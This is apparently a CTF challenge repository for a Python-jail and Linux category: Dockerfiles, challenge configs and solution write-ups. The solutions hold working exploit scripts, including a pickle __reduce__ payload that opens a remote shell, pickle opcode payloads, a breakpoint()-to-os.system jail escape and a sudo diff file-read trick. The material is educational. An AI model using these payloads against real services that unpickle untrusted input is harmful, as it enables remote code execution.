tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /jail/pickle-games-1/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{lEt_thE_piCkl3_gaMeS_BegiN!} -------------------------------------------------------------------------------- /jail/pickle-games-1/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1337:1337' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:1337 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /jail/pickle-games-1/solution/README.md: -------------------------------------------------------------------------------- 1 | # pickle games 1 2 | 3 | ## Write-up 4 | 5 | Input is not filtered at all, we can send a classic pickle RCE payload: 6 | 7 | ```python 8 | #!/usr/bin/env python3 9 | 10 | from pwn import * 11 | import pickle 12 | 13 | HOST, PORT, SSL = "pickle-games-1.challs.shellmates.club", 443, True 14 | 15 | class RCE: 16 | def __reduce__(self): 17 | return os.system, ("/bin/sh",) 18 | 19 | if __name__ == "__main__": 20 | io = remote(HOST, PORT, ssl=SSL) 21 | rce = RCE() 22 | payload = pickle.dumps(rce) 23 | data = payload.hex() 24 | io.recvuntil(b"data: ") 25 | io.sendline(data) 26 | io.sendline(b"id") 27 | io.sendline(b"cat flag.txt") 28 | io.interactive() 29 | ``` 30 | 31 | [solve.py](solve.py) 32 | 33 | -------------------------------------------------------------------------------- /jail/pickle-games-1/solution/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import pickle 5 | 6 | HOST, PORT, SSL = "pickle-games-1.challs.shellmates.club", 443, True 7 | 8 | class RCE: 9 | def __reduce__(self): 10 | return os.system, ("/bin/sh",) 11 | 12 | if __name__ == "__main__": 13 | io = remote(HOST, PORT, ssl=SSL) 14 | rce = RCE() 15 | payload = pickle.dumps(rce) 16 | data = payload.hex() 17 | io.recvuntil(b"data: ") 18 | io.sendline(data) 19 | io.sendline(b"id") 20 | io.sendline(b"cat flag.txt") 21 | io.interactive() 22 | -------------------------------------------------------------------------------- /jail/pickle-games-2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | 8 | COPY challenge /challenge/ 9 | 10 | WORKDIR /challenge 11 | 12 | RUN chmod +x challenge.py entrypoint.sh 13 | 14 | EXPOSE 1337 15 | 16 | ENTRYPOINT ["./entrypoint.sh"] 17 | -------------------------------------------------------------------------------- /jail/pickle-games-2/README.md: -------------------------------------------------------------------------------- 1 | # pickle games 2 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > I bet the first one was pretty easy after understanding what pickle is. 8 | > But now that I REDUCEd the inputs allowed, can you still reach the `FLAG` variable? 9 | 10 | **Connect with** : ncat -v --ssl pickle-games-2.challs.shellmates.club 443 11 | 12 | [challenge.py](./challenge/challenge.py) 13 | 14 | ## Solution 15 | 16 | Solution of the challenge can be found [here](solution/). 17 | -------------------------------------------------------------------------------- /jail/pickle-games-2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "pickle games 2" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: jail 6 | difficulty: medium 7 | 8 | description: | 9 | > I bet the first one was pretty easy after understanding what pickle is. 10 | > But now that I REDUCEd the inputs allowed, can you still reach the `FLAG` variable? 11 | 12 | **Author** : chenx3n 13 | 14 | connection_info: ncat -v --ssl pickle-games-2.challs.shellmates.club 443 15 | 16 | image: gcr.io/glowing-reserve-336013/pickle-games-2:latest 17 | 18 | value: 500 19 | type: dynamic 20 | 21 | extra: 22 | initial: 500 23 | decay: 15 24 | minimum: 50 25 | 26 | flags: 27 | - shellmates{No_RedUC1Ng_N3ED3d} 28 | 29 | tags: 30 | - medium 31 | 32 | files: 33 | - ./challenge/challenge.py 34 | 35 | requirements: 36 | - "pickle games 1" 37 | 38 | state: visible 39 | 40 | version: "0.1" 41 | -------------------------------------------------------------------------------- /jail/pickle-games-2/challenge/challenge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import pickle 4 | import pickletools 5 | 6 | from flag import FLAG 7 | 8 | 9 | def check(data): 10 | return len(data) <= 400 and all( 11 | opcode.code.encode() != pickle.REDUCE 12 | for opcode, _, _ in pickletools.genops(data) 13 | ) 14 | 15 | 16 | if __name__ == "__main__": 17 | print("Welcome to the pickle games! (Level 1)") 18 | data = bytes.fromhex(input("Enter your hex-encoded pickle data: ")) 19 | if check(data): 20 | result = pickle.loads(data) 21 | print(f"Result: {result}") 22 | else: 23 | print("Check failed :(") 24 | -------------------------------------------------------------------------------- /jail/pickle-games-2/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./challenge.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /jail/pickle-games-2/challenge/flag.py: -------------------------------------------------------------------------------- 1 | FLAG = "shellmates{No_RedUC1Ng_N3ED3d}" -------------------------------------------------------------------------------- /jail/pickle-games-2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1351:1337' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:1337 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /jail/pickle-games-2/solution/README.md: -------------------------------------------------------------------------------- 1 | # pickle games 2 2 | 3 | ## Write-up 4 | 5 | `REDUCE` opcode is filtered, which means we cannot execute functions. 6 | Though since the flag is being imported, we can just load it with the `GLOBAL` opcode using this payload: 7 | 8 | ```python 9 | pickle.PROTO + b"\x04" + \ 10 | pickle.GLOBAL + b"__main__\nFLAG\n" + \ 11 | pickle.STOP 12 | ``` 13 | 14 | Full exploit script: 15 | 16 | ```python 17 | #!/usr/bin/env python3 18 | 19 | from pwn import * 20 | import pickle 21 | 22 | HOST, PORT, SSL = "pickle-games-2.challs.shellmates.club", 443, True 23 | 24 | PAYLOAD = flat( 25 | pickle.PROTO + b"\x04", 26 | pickle.GLOBAL + b"__main__\nFLAG\n", 27 | pickle.STOP, 28 | ) 29 | 30 | if __name__ == "__main__": 31 | io = remote(HOST, PORT, ssl=SSL) 32 | data = PAYLOAD.hex().encode() 33 | io.recvuntil(b"data: ") 34 | io.sendline(data) 35 | io.interactive() 36 | ``` 37 | 38 | [solve.py](solve.py) 39 | 40 | -------------------------------------------------------------------------------- /jail/pickle-games-2/solution/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import pickle 5 | 6 | HOST, PORT, SSL = "pickle-games-2.challs.shellmates.club", 443, True 7 | 8 | PAYLOAD = flat( 9 | pickle.PROTO + b"\x04", 10 | pickle.GLOBAL + b"__main__\nFLAG\n", 11 | pickle.STOP, 12 | ) 13 | 14 | if __name__ == "__main__": 15 | io = remote(HOST, PORT, ssl=SSL) 16 | data = PAYLOAD.hex().encode() 17 | io.recvuntil(b"data: ") 18 | io.sendline(data) 19 | io.interactive() 20 | -------------------------------------------------------------------------------- /jail/pickle-games-3/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9-alpine 2 | 3 | RUN apk update && \ 4 | apk add socat 5 | 6 | RUN adduser --disabled-password --no-create-home ctf 7 | 8 | COPY challenge /challenge/ 9 | 10 | WORKDIR /challenge 11 | 12 | RUN chmod +x challenge.py entrypoint.sh 13 | 14 | EXPOSE 1337 15 | 16 | ENTRYPOINT ["./entrypoint.sh"] 17 | -------------------------------------------------------------------------------- /jail/pickle-games-3/README.md: -------------------------------------------------------------------------------- 1 | # pickle games 3 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > Things are getting a little more serious now. 8 | > Can you find a way to escape this pickle! 9 | 10 | **Connect with** : ncat -v --ssl pickle-games-3.challs.shellmates.club 443 11 | 12 | [challenge.py](./challenge/challenge.py) 13 | 14 | ## Solution 15 | 16 | Solution of the challenge can be found [here](solution/). 17 | -------------------------------------------------------------------------------- /jail/pickle-games-3/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "pickle games 3" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: jail 6 | difficulty: medhard 7 | 8 | description: | 9 | > Things are getting a little more serious now. 10 | > Can you find a way to escape this pickle! 11 | 12 | **Author** : chenx3n 13 | 14 | connection_info: ncat -v --ssl pickle-games-3.challs.shellmates.club 443 15 | 16 | image: gcr.io/glowing-reserve-336013/pickle-games-3:latest 17 | 18 | value: 500 19 | type: dynamic 20 | 21 | extra: 22 | initial: 500 23 | decay: 15 24 | minimum: 50 25 | 26 | flags: 27 | - shellmates{Y0ur3_g3Tt1Ng_g0od_at_tHIs_But_CaN_yOU_$0lv3_tHe_fiNAl_G4me?} 28 | 29 | tags: 30 | - medium/hard 31 | 32 | files: 33 | - ./challenge/challenge.py 34 | 35 | requirements: 36 | - "pickle games 2" 37 | 38 | state: visible 39 | 40 | version: "0.1" 41 | -------------------------------------------------------------------------------- /jail/pickle-games-3/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="ctf" 4 | EXEC="./challenge.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive exec:"$EXEC",stderr,su="$USER" 8 | -------------------------------------------------------------------------------- /jail/pickle-games-3/challenge/flag.py: -------------------------------------------------------------------------------- 1 | FLAG = "shellmates{Y0ur3_g3Tt1Ng_g0od_at_tHIs_But_CaN_yOU_$0lv3_tHe_fiNAl_G4me?}" 2 | -------------------------------------------------------------------------------- /jail/pickle-games-3/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1352:1337' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:1337 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /jail/pickle-games-3/solution/README.md: -------------------------------------------------------------------------------- 1 | # pickle games 3 2 | 3 | ## Write-up 4 | 5 | ```python 6 | pickle.PROTO + b"\x04" + \ 7 | pickle.GLOBAL + b"__main__\nEmpty.__getattribute__\n", 8 | pickle.GLOBAL + b"__main__\nflagObj\n", 9 | pickle.UNICODE + b"flag\n", 10 | pickle.TUPLE2, 11 | pickle.REDUCE, 12 | pickle.STOP, 13 | ``` 14 | 15 | Full exploit script: 16 | 17 | ```python 18 | #!/usr/bin/env python3 19 | 20 | from pwn import * 21 | import pickle 22 | 23 | HOST, PORT, SSL = "pickle-games-3.challs.shellmates.club", 443, True 24 | 25 | PAYLOAD = flat( 26 | pickle.PROTO + b"\x04", 27 | pickle.GLOBAL + b"__main__\nEmpty.__getattribute__\n", 28 | pickle.GLOBAL + b"__main__\nflagObj\n", 29 | pickle.UNICODE + b"flag\n", 30 | pickle.TUPLE2, 31 | pickle.REDUCE, 32 | pickle.STOP, 33 | ) 34 | 35 | if __name__ == "__main__": 36 | io = remote(HOST, PORT, ssl=SSL) 37 | data = PAYLOAD.hex().encode() 38 | io.recvuntil(b"data: ") 39 | io.sendline(data) 40 | io.interactive() 41 | ``` 42 | 43 | [solve.py](solve.py) 44 | 45 | -------------------------------------------------------------------------------- /jail/pickle-games-3/solution/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from pwn import * 4 | import pickle 5 | 6 | HOST, PORT, SSL = "pickle-games-3.challs.shellmates.club", 443, True 7 | 8 | PAYLOAD = flat( 9 | pickle.PROTO + b"\x04", 10 | pickle.GLOBAL + b"__main__\nEmpty.__getattribute__\n", 11 | pickle.GLOBAL + b"__main__\nflagObj\n", 12 | pickle.UNICODE + b"flag\n", 13 | pickle.TUPLE2, 14 | pickle.REDUCE, 15 | pickle.STOP, 16 | ) 17 | 18 | if __name__ == "__main__": 19 | io = remote(HOST, PORT, ssl=SSL) 20 | data = PAYLOAD.hex().encode() 21 | io.recvuntil(b"data: ") 22 | io.sendline(data) 23 | io.interactive() 24 | -------------------------------------------------------------------------------- /jail/pyjail/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.8-slim-buster 2 | 3 | RUN apt-get update \ 4 | && apt-get install -y socat 5 | 6 | COPY challenge /challenge 7 | 8 | RUN chmod 700 /tmp 9 | 10 | WORKDIR /challenge 11 | 12 | RUN chmod +x entrypoint.sh challenge.py 13 | 14 | EXPOSE 1337 15 | 16 | ENTRYPOINT ["/challenge/entrypoint.sh"] 17 | -------------------------------------------------------------------------------- /jail/pyjail/README.md: -------------------------------------------------------------------------------- 1 | # pyjail 2 | 3 | **`Author:`** [1m4D](https://github.com/imadbourouche) 4 | 5 | ## Description 6 | 7 | > I filtered everything in my python interpreter, Can you get a shell ? 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). 12 | -------------------------------------------------------------------------------- /jail/pyjail/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "pyjail" 2 | author: "1m4D" 3 | author_link: "https://github.com/imadbourouche" 4 | 5 | category: jail 6 | difficulty: medium 7 | 8 | description: | 9 | > I filtered everything in my python interpreter, Can you get a shell ? 10 | 11 | **Author** : 1m4D 12 | 13 | connection_info: ncat -v --ssl pyjail.challs.shellmates.club 443 14 | 15 | image: gcr.io/glowing-reserve-336013/pyjail 16 | 17 | flags: 18 | - shellmates{BR3kP01nT_BuiLT1N_D0_M4g1C_98765} 19 | 20 | files: 21 | - ./challenge/challenge.py 22 | 23 | tags: 24 | - medium 25 | 26 | value: 500 27 | type: dynamic 28 | extra: 29 | initial: 500 30 | decay: 15 31 | minimum: 50 32 | 33 | state: visible 34 | 35 | version: "0.1" 36 | -------------------------------------------------------------------------------- /jail/pyjail/challenge/challenge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | 4 | BLACKLIST="!\"#$%&'*+,-./0123456789:;<=>?@[\\]^_`{|}~ \t\n\r\x0b\x0c" 5 | while 1: 6 | exp=input('>>> ') 7 | check1 = all(ord(i)<127 for i in exp) 8 | check2 = all(i not in exp for i in BLACKLIST) 9 | check3 = exp.find('input')+exp.find('eval')+exp.find('exec') 10 | if check1 and check2 and check3==-3: 11 | try: 12 | eval(exp) 13 | except Exception as e: 14 | print(e) 15 | else: 16 | print('BAD!') 17 | -------------------------------------------------------------------------------- /jail/pyjail/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | USER="nobody" 4 | EXEC="./challenge.py" 5 | PORT=1337 6 | 7 | socat -dd -T300 tcp-l:$PORT,reuseaddr,fork,keepalive,su="$USER" exec:"$EXEC",stderr 8 | -------------------------------------------------------------------------------- /jail/pyjail/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{BR3kP01nT_BuiLT1N_D0_M4g1C_98765} 2 | -------------------------------------------------------------------------------- /jail/pyjail/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.3" 2 | services: 3 | server: 4 | build: . 5 | ports: 6 | - '1337:1337' 7 | deploy: 8 | replicas: 1 9 | restart_policy: 10 | condition: on-failure 11 | resources: 12 | limits: 13 | memory: 50M 14 | healthcheck: 15 | test: socat - TCP4:localhost:1337 || exit 1 16 | interval: 60s 17 | timeout: 2s 18 | retries: 5 -------------------------------------------------------------------------------- /jail/pyjail/solution/README.md: -------------------------------------------------------------------------------- 1 | # pyjail 2 | 3 | ## Write-up 4 | 5 | - `breakpoint()` builtin in python open pdb which is python debugger and it's an interpreter also 6 | 7 | ``` 8 | ~ nc localhost 1337 9 | >>> breakpoint() 10 | --Return-- 11 | > (1)()->None 12 | (Pdb) import os 13 | (Pdb) os.system("sh") 14 | ls 15 | entrypoint.sh 16 | flag.txt 17 | script.py 18 | cat flag.txt 19 | shellmates{BR3kP01nT_BuiLT1N_D0_M4g1C_98765} 20 | ``` 21 | 22 | ## Flag 23 | `shellmates{BR3kP01nT_BuiLT1N_D0_M4g1C_98765}` 24 | -------------------------------------------------------------------------------- /jail/pyjail2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends openssh-server sudo systemd rsyslog 5 | 6 | RUN useradd -M -s /bin/bash ctf-cracked \ 7 | && useradd -M -s /bin/bash ctf \ 8 | && echo 'ctf:ctf' | chpasswd \ 9 | && usermod -aG sudo ctf 10 | 11 | COPY challenge/flag.txt / 12 | COPY challenge/sudoers /etc/sudoers 13 | COPY challenge/sshd_config /etc/ssh/sshd_config 14 | COPY challenge/chall.py /chall.py 15 | 16 | RUN chown root:ctf-cracked /flag.txt \ 17 | && chmod 440 /flag.txt \ 18 | && chmod +x /chall.py 19 | 20 | RUN chmod 770 /tmp /var/tmp 21 | 22 | ENTRYPOINT service rsyslog start \ 23 | && service ssh start \ 24 | && tail -f --retry -------------------------------------------------------------------------------- /jail/pyjail2/README.md: -------------------------------------------------------------------------------- 1 | # pyjail2 2 | 3 | **`Author:`** [Ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > I filtered everything in my python interpreter, Can you get a shell ? 8 | > Again? 9 | 10 | ## Solution 11 | 12 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /jail/pyjail2/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "pyjail2" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | 5 | category: jail 6 | difficulty: hard 7 | 8 | description: | 9 | > I filtered everything in my python interpreter, Can you get a shell ? 10 | > Again? 11 | 12 | **Password** : ctf 13 | 14 | **Author** : Ouxs 15 | 16 | connection_info: ssh ctf@pyjail2 -o ProxyCommand="openssl s_client -quiet -connect pyjail2.challs.shellmates.club:443 -servername pyjail2.challs.shellmates.club" 17 | 18 | image: gcr.io/glowing-reserve-336013/pyjail2 19 | 20 | requirements: 21 | - "pyjail" 22 | 23 | flags: 24 | - shellmates{I7's_4ll_4b0U7_PYYYYY_SKILZZZ} 25 | 26 | files: 27 | - challenge/chall.py 28 | 29 | tags: 30 | - hard 31 | 32 | value: 500 33 | type: dynamic 34 | extra: 35 | initial: 500 36 | decay: 15 37 | minimum: 50 38 | 39 | state: visible 40 | version: "0.1" -------------------------------------------------------------------------------- /jail/pyjail2/challenge/chall.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | WHITELIST = 'abcdefghijklmnopqrstuvwxyz()' 4 | NOT_ALLOWED_FUNCTIONS = ['input', 'exec', 'eval', 'breakpoint', 'help'] 5 | 6 | while True: 7 | expr = input("[ EVAL THIS FOR ME ] --> ") 8 | if any(char not in WHITELIST for char in expr ) or any(forbid in expr for forbid in NOT_ALLOWED_FUNCTIONS): 9 | print("NOPE!") 10 | else : 11 | if expr == "exit()" : exit() 12 | try : 13 | eval(expr) 14 | except : 15 | print("Don't break it please.") 16 | 17 | 18 | -------------------------------------------------------------------------------- /jail/pyjail2/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{I7's_4ll_4b0U7_PYYYYY_SKILZZZ} 2 | -------------------------------------------------------------------------------- /jail/pyjail2/challenge/sudoers: -------------------------------------------------------------------------------- 1 | # 2 | # This file MUST be edited with the 'visudo' command as root. 3 | # 4 | # Please consider adding local content in /etc/sudoers.d/ instead of 5 | # directly modifying this file. 6 | # 7 | # See the man page for details on how to write a sudoers file. 8 | # 9 | Defaults env_reset 10 | Defaults mail_badpass 11 | Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" 12 | 13 | # Host alias specification 14 | 15 | # User alias specification 16 | 17 | # Cmnd alias specification 18 | 19 | # User privilege specification 20 | root ALL=(ALL:ALL) ALL 21 | 22 | 23 | # See sudoers(5) for more information on "#include" directives: 24 | 25 | #includedir /etc/sudoers.d 26 | ctf ALL=(ctf-cracked:ctf-cracked) /chall.py 27 | -------------------------------------------------------------------------------- /jail/pyjail2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1337:22' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | healthcheck: 17 | test: socat - TCP4:localhost:22 || exit 1 18 | interval: 60s 19 | timeout: 2s 20 | retries: 5 21 | -------------------------------------------------------------------------------- /linux/README.md: -------------------------------------------------------------------------------- 1 | # Linux 2 | 3 | This directory contains challenges related to the `Linux` category. Please consider reading the [contribution guidelines](../CONTRIBUTING.md) before making any contribution. 4 | -------------------------------------------------------------------------------- /linux/diff/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends openssh-server sudo systemd rsyslog 5 | 6 | RUN useradd -M -s /bin/bash ctf-cracked \ 7 | && useradd -M -s /bin/bash ctf \ 8 | && echo 'ctf:ctf' | chpasswd \ 9 | && usermod -aG sudo ctf 10 | 11 | COPY challenge/flag.txt / 12 | COPY challenge/sudoers /etc/sudoers 13 | COPY challenge/sshd_config /etc/ssh/sshd_config 14 | 15 | RUN chown root:ctf-cracked /flag.txt \ 16 | && chmod 440 /flag.txt 17 | 18 | RUN chmod 770 /tmp /var/tmp 19 | 20 | ENTRYPOINT service rsyslog start \ 21 | && service ssh start \ 22 | && tail -f --retry -------------------------------------------------------------------------------- /linux/diff/README.md: -------------------------------------------------------------------------------- 1 | # diff 2 | 3 | **`Author:`** [Ouxs](https://github.com/ouxs-19) 4 | 5 | ## Description 6 | 7 | > He is offering a great tool, if you only knew how to use it. 8 | 9 | ## Solution 10 | 11 | Solution of the challenge can be found [here](solution/). -------------------------------------------------------------------------------- /linux/diff/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "diff" 2 | author: "Ouxs" 3 | author_link: "https://github.com/ouxs-19/" 4 | 5 | category: linux 6 | difficulty: easy 7 | 8 | description: | 9 | > He is offering a great tool, if you only knew how to use it. 10 | 11 | **Password** : ctf 12 | **Author** : Ouxs 13 | 14 | connection_info: ssh ctf@diff -o ProxyCommand="openssl s_client -quiet -connect diff.challs.shellmates.club:443 -servername diff.challs.shellmates.club" 15 | 16 | image: gcr.io/glowing-reserve-336013/diff 17 | 18 | flags: 19 | - shellmates{You_ma$tered_th3_t00L} 20 | 21 | tags: 22 | - easy 23 | 24 | value: 500 25 | type: dynamic 26 | extra: 27 | initial: 500 28 | decay: 15 29 | minimum: 50 30 | 31 | state: visible 32 | version: "0.1" -------------------------------------------------------------------------------- /linux/diff/challenge/flag.txt: -------------------------------------------------------------------------------- 1 | shellmates{You_ma$tered_th3_t00L} 2 | -------------------------------------------------------------------------------- /linux/diff/challenge/sudoers: -------------------------------------------------------------------------------- 1 | # 2 | # This file MUST be edited with the 'visudo' command as root. 3 | # 4 | # Please consider adding local content in /etc/sudoers.d/ instead of 5 | # directly modifying this file. 6 | # 7 | # See the man page for details on how to write a sudoers file. 8 | # 9 | Defaults env_reset 10 | Defaults mail_badpass 11 | Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin" 12 | 13 | # Host alias specification 14 | 15 | # User alias specification 16 | 17 | # Cmnd alias specification 18 | 19 | # User privilege specification 20 | root ALL=(ALL:ALL) ALL 21 | 22 | 23 | # See sudoers(5) for more information on "#include" directives: 24 | 25 | #includedir /etc/sudoers.d 26 | ctf ALL=(ctf-cracked:ctf-cracked) /usr/bin/diff 27 | -------------------------------------------------------------------------------- /linux/diff/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3.8' 2 | 3 | services: 4 | 5 | server: 6 | build: . 7 | ports: 8 | - '1337:22' 9 | deploy: 10 | replicas: 1 11 | restart_policy: 12 | condition: on-failure 13 | resources: 14 | limits: 15 | memory: 50M 16 | -------------------------------------------------------------------------------- /linux/diff/solution/README.md: -------------------------------------------------------------------------------- 1 | # diff 2 | 3 | ## Write-up 4 | 5 | After accessing the system, we can see that the *flag.txt* file can only be read by `root` user and `ctf-cracked` group. 6 | By executig `id` command, we see that we're logged in as the user `ctf` that doesn't belong to `ctf-cracked` group but belongs to `sudo` group. 7 | Let's see what can the `ctf` user execute using `sudo` : 8 | ![sudo -l result](./images/cap3.png) 9 | We can execute *diff* command as `ctf-cracked` user, so we have to find a way to read the *flag.txt* file using this command. 10 | Since *diff* command shows the differences between the content of two given files, it is sufficient to compare the *flag.txt* file with any other existing accessible file that has different content. 11 | 12 | ## Payload 13 | ```bash 14 | sudo -u ctf-cracked diff flag.txt /etc/passwd 15 | ``` 16 | ![diff result](./images/cap4.png) 17 | 18 | ## Flag 19 | 20 | `shellmates{You_ma$tered_th3_t00L}` 21 | 22 | -------------------------------------------------------------------------------- /linux/diff/solution/images/cap1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/diff/solution/images/cap1.png -------------------------------------------------------------------------------- /linux/diff/solution/images/cap2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/diff/solution/images/cap2.png -------------------------------------------------------------------------------- /linux/diff/solution/images/cap3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/diff/solution/images/cap3.png -------------------------------------------------------------------------------- /linux/diff/solution/images/cap4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/diff/solution/images/cap4.png -------------------------------------------------------------------------------- /linux/loca-loca-1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.9 2 | 3 | RUN apt-get update \ 4 | && DEBIAN_FRONTEND=noninteractive apt-get install -y --no-install-recommends \ 5 | locales locales-all \ 6 | && rm -rf /var/lib/apt/lists/* 7 | 8 | COPY requirements.txt /tmp/ 9 | 10 | RUN python -m pip install -r /tmp/requirements.txt && \ 11 | rm /tmp/requirements.txt 12 | 13 | WORKDIR /challenge 14 | 15 | COPY challenge/server.py . 16 | COPY challenge/entrypoint.sh . 17 | COPY challenge/flag.runme . 18 | 19 | RUN chmod +x server.py entrypoint.sh && \ 20 | chmod 111 flag.runme 21 | 22 | EXPOSE 8765 23 | 24 | USER nobody 25 | 26 | ENTRYPOINT ["./entrypoint.sh"] 27 | -------------------------------------------------------------------------------- /linux/loca-loca-1/README.md: -------------------------------------------------------------------------------- 1 | # Loca Loca 1 2 | 3 | **`Author:`** [chenx3n](https://github.com/malikDaCoda) 4 | 5 | ## Description 6 | 7 | > Wanna take a look at my new websocket service? You can upload files and show the date. 8 | > Oh you wanna know how I'm showing the date? I'm simply executing the `date` command using `subprocess`: `subprocess.Popen("date")`. 9 | 10 | **Notes** : 11 | - Make sure to install `websockets` before running the client below: `python3 -m pip install websockets`. 12 | 13 | ## Solution 14 | 15 | Solution of the challenge can be found [here](solution/). 16 | 17 | -------------------------------------------------------------------------------- /linux/loca-loca-1/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "Loca Loca 1" 2 | author: "chenx3n" 3 | author_link: "https://github.com/malikDaCoda" 4 | 5 | category: linux 6 | difficulty: medium 7 | 8 | description: | 9 | > Wanna take a look at my new websocket service? You can upload files and show the date. 10 | > Oh you wanna know how I'm showing the date? I'm simply executing the `date` command using `subprocess`: `subprocess.Popen("date")`. 11 | 12 | **Notes** : 13 | - Make sure to install `websockets` before running the client below: `python3 -m pip install websockets`. 14 | 15 | **Author** : chenx3n 16 | 17 | connection_info: python3 client.py docker.shellmates.club $INSTANCE_PORT 18 | 19 | image: gcr.io/glowing-reserve-336013/loca-loca-1:latest 20 | docker_image: gcr.io/glowing-reserve-336013/loca-loca-1:latest 21 | 22 | value: 500 23 | type: docker 24 | 25 | tags: 26 | - medium 27 | 28 | files: 29 | - ./challenge/client.py 30 | 31 | flags: 32 | - shellmates{Wh3n_wIlL_YOu_l34rn_To_EXeCuT3_biN4R1e$_WitH_TH3iR_4BSOluT3_P4Th} 33 | 34 | state: visible 35 | 36 | version: "0.1" 37 | -------------------------------------------------------------------------------- /linux/loca-loca-1/challenge/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | while :; do 4 | ./server.py 5 | echo "Restarting server..." 6 | done 7 | -------------------------------------------------------------------------------- /linux/loca-loca-1/challenge/flag.runme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shellmates/HackINI-2k22-CTF-challs/b302c688552a18c0c43c40244034a9cb4bc88337/linux/loca-loca-1/challenge/flag.runme 